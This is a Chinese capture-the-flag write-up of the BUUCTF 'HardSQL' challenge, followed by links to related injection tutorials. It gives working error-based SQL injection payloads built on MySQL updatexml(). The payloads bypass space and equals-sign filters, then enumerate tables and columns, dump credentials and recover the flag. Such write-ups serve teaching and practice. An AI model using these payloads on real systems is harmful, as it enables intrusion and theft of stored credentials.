BUUCTF----[极客大挑战 2019]HardSQL

输入1'

单引号闭合

进行永真式判断

复制代码
竟然说我是臭弟弟----八嘎(肯定是进行了过滤)
经过手法判断,过滤了=,空格,and等

报错注入updatexml()

复制代码
报错注入顾名思义就是,通过特殊函数错误使用并使其输出错误结果来获取信息的

UPDATEXML() 是 MySQL 数据库中的一个函数,它用于修改 XML 文档中的值。这个函数返回修改后的 XML 文档,并可以根据指定的 XPath 表达式和新的值来更新 XML 文档中的特定部分。

UPDATEXML() 函数的语法如下:

UPDATEXML(xml_doc, xpath_expr, new_value)
xml_doc:要修改的 XML 文档。
xpath_expr:用于定位要修改的 XML 文档部分的 XPath 表达式。
new_value:要插入到 XML 文档中的新值。

查库

复制代码
空格用()绕过
=用like绕过

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

查表

复制代码
1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

查字段

复制代码
1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
复制代码
1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'--',password))from(H4rDsq1)),0x7e),1))#

只出现一半的flag,使用leftright函数,进行一半一半的查询

复制代码
1'or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)),0x7e),1))#
复制代码
1'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)),0x7e),1))#

拼接得到完整的flag

复制代码
flag{b999a4be-8147-468b-8eba-360a077eaef0}
相关推荐
码农12138号4 小时前
BUUCTF在线评测-练习场-WebCTF习题[GYCTF2020]Blacklist1-flag获取、解析
web安全·网络安全·ctf·sql注入·handler·buuctf
mooyuan天天3 天前
DVWA靶场通关笔记-SQL盲注(SQL Injection Blind Medium级别)
sql注入·sql盲注·sql注入漏洞·布尔盲注·dvwa靶场
mooyuan天天1 个月前
pikachu靶场通关笔记24 SQL注入07-http header注入
sql注入·pikachu靶场·sql注入漏洞·cookie注入·header注入
mooyuan天天1 个月前
Webug4.0靶场通关笔记03- 第3关SQL注入之时间盲注(手注法+脚本法 两种方法)
sql注入·sql注入漏洞·时间盲注·webug靶场·webug4靶场
SuperherRo2 个月前
Web攻防-SQL注入&数据库类型&用户权限&架构分层&符号干扰&利用过程&发现思路
sql注入·用户权限·数据库类型·架构分层·符号干扰·利用过程
mooyuan天天2 个月前
SQL注入报错“Illegal mix of collations for operation ‘UNION‘”解决办法
数据库·web安全·sql注入·dvwa靶场·sql报错
Le_ee2 个月前
sqli-labs靶场第七关——文件导出注入
数据库·sql·网络安全·php·sql注入·sqli—labs
mooyuan天天2 个月前
DVWA靶场通关笔记-SQL注入(SQL Injection Medium级别)
web安全·渗透测试·sql注入·sql注入漏洞·dvwa靶场
Le_ee2 个月前
sqli-labs靶场第二关——数字型
数据库·sql·网络安全·sql注入·sqli—labs
mooyuan天天2 个月前
Webug4.0通关笔记03- 第4关POST注入和第5关过滤注入
web安全·sql注入·webug靶场